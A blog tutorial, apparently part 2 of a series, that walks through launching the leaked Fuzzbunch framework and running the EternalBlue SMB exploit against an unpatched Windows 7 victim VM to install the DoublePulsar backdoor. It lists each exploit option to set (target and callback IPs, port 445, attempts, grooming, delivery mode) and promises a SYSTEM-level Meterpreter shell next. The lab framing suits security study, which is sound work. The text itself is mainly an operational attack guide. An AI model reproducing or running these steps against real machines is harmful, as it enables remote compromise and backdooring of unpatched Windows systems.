about 2 years ago

## From git clone to Pwned - Owning Windows with DoublePulsar and EternalBlue (Part 2)

(NOTE: This is part two in a short series. If you haven't configured your environment, please read Part 1.)

By now, your environment is configured, you've been able to launch the Fuzzbunch framework, and you're probably ready to hack something. In this article we'll go through the process of using EternalBlue to create a backdoor. I'm going to make the following assumptions:

1. You have configured a local VM network with 1 Windows attack machine and 1 Windows 7 victim machine.
2. You have gone through the first blog post and can launch the Fuzzbunch framework.
3. You have basic command of the Windows operating system and command line.

For reference, in my lab environment, this is the setup:

1. Attacker Box - 10.0.2.5. Windows 7 SP1 x64.
2. Kali Box - 10.0.2.15. Kali Rolling. (We'll use this in Part 3)
3. Victim Box - 10.0.2.7. Windows 7 SP1 x64, without the MS17-010 patches applied.

In the next tutorial we're going to use the DLL injection function in DoublePulsar - however, the first step in this process is to backdoor the Victim with Eternal Blue. Launch Fuzzbunch, and enter the following:

Default Target IP Address []: 10.0.2.7
Default Callback IP Address []: 10.0.2.5
Use Redirection [yes]: no
Base Log directory [D:\logs]: c:\fb_logs

If you have run Fuzzbunch in the past, you may see a list of projects. If this is your first run, you'll see a prompt to select or create a new project. Select [0] to create a new project. Give it a name, and you should see something like this:

Time to backdoor our Windows box. Remember that exploits run through EternalBlue (the backdoor itself), so this is a critical step.

1. Type use eternalblue
2. Fuzzbunch populates your options with defaults. The good news is, this is mostly correct out of the box. It'll ask if you want to be prompted for variables - lets go through this, as there is one default we're going to change. Types yes or hit enter to continue.
3. NetworkTimeout [60]: This is fine unless youre on a slow link. Hit enter. If you notice timeouts, come back to this section and bump it up to 90 or 120 seconds.
4. TargetIP [10.0.2.7]: This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now - otherwise, hit enter.
5. TargetPort [445]: EternalBlue targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.
6. VerifyTarget [True]: You can set this to False to speed things up - but its a good idea to verify the target exists and is vulnerable before firing things off.
7. VerifyBackdoor [True]: Verify that your backdoor exploit actually succeeds.
8. MaximumExploitAttempts [3]: How many times should EternalBlue attempt to install the backdoor? I have seen EternalBlue fail the first attempt and succeed the second - so I'd recommend leaving it at 3.
9. GroomAllocations [12]: The number of SMB Buffers to use. Accept the defaults.
10. Target [WIN72K8R2]: In our example, we're targetting Windows 7. If you're using XP, select the appropriate option.
11. Mode :: Delivery Mechanism [FB]: We're going to use Fuzzbunch. In a future post, we'll discuss DARINGNEOPHYTE.
12. Fuzzbunch Confirmation: This confirms that you want to use Fuzzbunch.
13. Destination IP [10.0.2.7]: This is for your local tunnel. In our example, keep it as default
14. Destination Port [445]: As per above, this is for your local tunnel. Accept the default.
15. You should now see a summary of the configured EternalBlue module, as seen below:

Everything look good? Hit enter, and we'll see Fuzzbunch backdoor the victim machine. This happens quick, but the authors have made a point of a celebratory =-=-=WIN=-=-= banner.

Here's the exploit in its entirety, from answering yes to a successful backdoor.

Note that EternalBlue checks for the existance of a backdoor before continuing. If you see =-=-=-=-=WIN=-=-=-=-= toward the end, and a green [+] Eternalblue Succeeded message then congratulations! You've just launched a nation state exploit against an unsuspecting lab machine. I'd suggest running through these steps again, right away, to see how things play out when you try to backdoor a box that has already been backdoored with EternalBlue. In the next post, we'll pop a Meterpreter shell as NT Authority\System in minutes flat.